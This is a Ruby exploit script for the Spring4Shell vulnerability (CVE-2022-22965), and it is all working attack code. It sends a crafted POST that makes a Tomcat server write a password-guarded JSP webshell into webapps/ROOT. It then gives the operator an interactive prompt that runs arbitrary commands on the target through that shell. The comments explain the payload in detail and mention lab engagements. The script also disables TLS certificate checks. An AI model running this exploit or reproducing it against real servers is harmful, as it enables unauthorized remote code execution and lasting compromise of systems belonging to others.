#!/usr/bin/ruby
#
# CVE-2022-22965 | Spring4Shell Exploit in Ruby
# Coded By Habib | Twitter @hab1b0x | LinkedIn @habib0x
# Date | 15/04/2022 - 11:02 AM
#
require 'net/http'
require 'openssl'
require 'uri'
require 'readline'
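# Print the banner and the usage line to $stdout; returns nil.
#
# The art lives in a single-quoted heredoc (<<~'BANNER') on purpose: inside a
# double-quoted string Ruby treats `\ `, `\/` and `\_` as escape sequences and
# silently drops the backslash, which erased several strokes of the ASCII art
# in the original `"""..."""` version. A single-quoted heredoc keeps every
# backslash literally. The leading blank line reproduces the original's
# leading newline.
def title
  puts <<~'BANNER'

    # c c wWw wWw -2022-22965
    # (OO) (O) (O) wWw
    # ,'.--.) ( \ / ) (O)_
    # / //_|_\ \ \ / / .' __)
    # | \___ / \/ \ ( _)
    # '. ) \ `--' / `.__)
    # `-.' `-..-'
    # Author:Habib
    # ruby CVE-2022-22965.rb target_url
    # ruby CVE-2022-22965.rb http://localhost
  BANNER
end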
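# --- Argument handling -------------------------------------------------------
# No target on the command line: show banner + usage and exit cleanly.
if ARGV.empty?
  title
  exit 0
end

# Normalise the target into an absolute URL.
#
# Only a real scheme prefix counts as "already has a scheme". The previous
# `start_with?('http')` test also matched hostnames such as `httpd.lab`, which
# then reached URI() without a scheme and produced a nil host for Net::HTTP.
target = ARGV[0]
target = "http://#{target}" unless target.start_with?('http://', 'https://')

uri  = URI(target)
http = Net::HTTP.new(uri.host, uri.port)

# Use TLS for https:// targets.
#
# NOTE(security): certificate verification is disabled deliberately — lab
# targets are routinely self-signed and the point is reachability, not trust.
# This makes the connection trivially interceptable; never reuse this client
# configuration in code that carries real credentials.
if uri.scheme == 'https'
  http.use_ssl     = true
  http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end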
# --- Build the exploit request -----------------------------------------------
# A single POST whose form fields are the Tomcat AccessLogValve properties that
# CVE-2022-22965 lets Spring's data binder reach through
# `class.module.classLoader.resources.context.parent.pipeline.first.*`.
# The valve is re-pointed at webapps/ROOT/shell.jsp and given a log "pattern"
# that is really JSP source, so that its log output is intended to materialise
# as a webshell on disk.
#
# The `%{c0}i` / `%{c1}i` / `%{c2}i` tokens are Tomcat access-log pattern
# syntax for "value of request header c0/c1/c2": the JSP delimiters `<%`, `%>`
# and the word `Runtime` travel in headers instead of the form body so they do
# not appear literally in the (possibly filtered or logged) POST data.
#
# NOTE(security): the resulting shell is guarded only by the static
# `pwd=j` parameter — anyone who finds shell.jsp can execute commands.
# NOTE(review): `new String(b)` in the JSP converts the full 2048-byte buffer
# rather than the `a` bytes actually read, so command output can carry
# trailing garbage from earlier reads; left untouched to keep the known payload.
req = Net::HTTP::Post.new(uri.request_uri)

req['User-Agent']   = 'Habib0x'
req['Cookie']       = 'JSESSIONID=6E7E484B4224DC148F4E67F9027122AA'
req['c0']           = '%>//'
req['c1']           = 'Runtime'
req['c2']           = '<%'
req['Content-Type'] = 'application/x-www-form-urlencoded'
req['Connection']   = 'close'

valve = 'class.module.classLoader.resources.context.parent.pipeline.first.'
jsp_pattern = '%{c2}i if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{c0}i'

req.set_form_data({
  "#{valve}suffix"         => '.jsp',
  "#{valve}pattern"        => jsp_pattern,
  "#{valve}prefix"         => 'shell',
  "#{valve}directory"      => 'webapps/ROOT',
  "#{valve}fileDateFormat" => ''
})
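# --- Send the request and, on success, open an interactive shell -------------
res = http.request(req)

# NOTE(security): a 200 only means the server accepted the POST; it does not
# prove the JSP was written. Treat "[+] exploitable" as a hint and confirm by
# requesting the printed shell URL. The shell is persistent and guarded only by
# the static `pwd=j` parameter — delete webapps/ROOT/shell.jsp on the target
# when the engagement is over.
if res.code == '200'
  # Path of the shell relative to the target's own path (target may carry a
  # context path such as http://host/app). chomp('/') avoids "//shell.jsp".
  shell_path = "#{uri.path.chomp('/')}/shell.jsp"

  puts '[+] Target is exploitable !!'
  puts "[+] JSP Shell: #{target.chomp('/')}/shell.jsp?pwd=j&cmd=CMD"
  puts '[+] Type your commands (exit to quit) and press Enter!'

  # Ctrl-C is ignored, so the prompt is left only with "exit" or EOF.
  trap('INT', 'SIG_IGN')

  loop do
    command = Readline.readline('Spring4Shell-> ', true)
    # EOF (Ctrl-D) yields nil; the original then crashed on nil.empty?.
    break if command.nil?

    command = command.strip
    next if command.empty?
    # Exact match: the previous `=~ /exit/` also quit on e.g. "cat exit.log".
    break if command == 'exit'

    # URL-encode the command. Unencoded, a space made URI() raise
    # URI::InvalidURIError and a '&' or '#' truncated the command server-side.
    query = "pwd=j&cmd=#{URI.encode_www_form_component(command)}"
    shell_req = Net::HTTP::Get.new("#{shell_path}?#{query}")

    # Reuse the configured client so an https target keeps the VERIFY_NONE
    # setting; Net::HTTP.get_response would open a fresh, verifying connection
    # and fail against the same self-signed host the POST just reached.
    puts http.request(shell_req).body
  end
else
  puts "[-] Target is not exploitable !! ~ Response: #{res.code}"
end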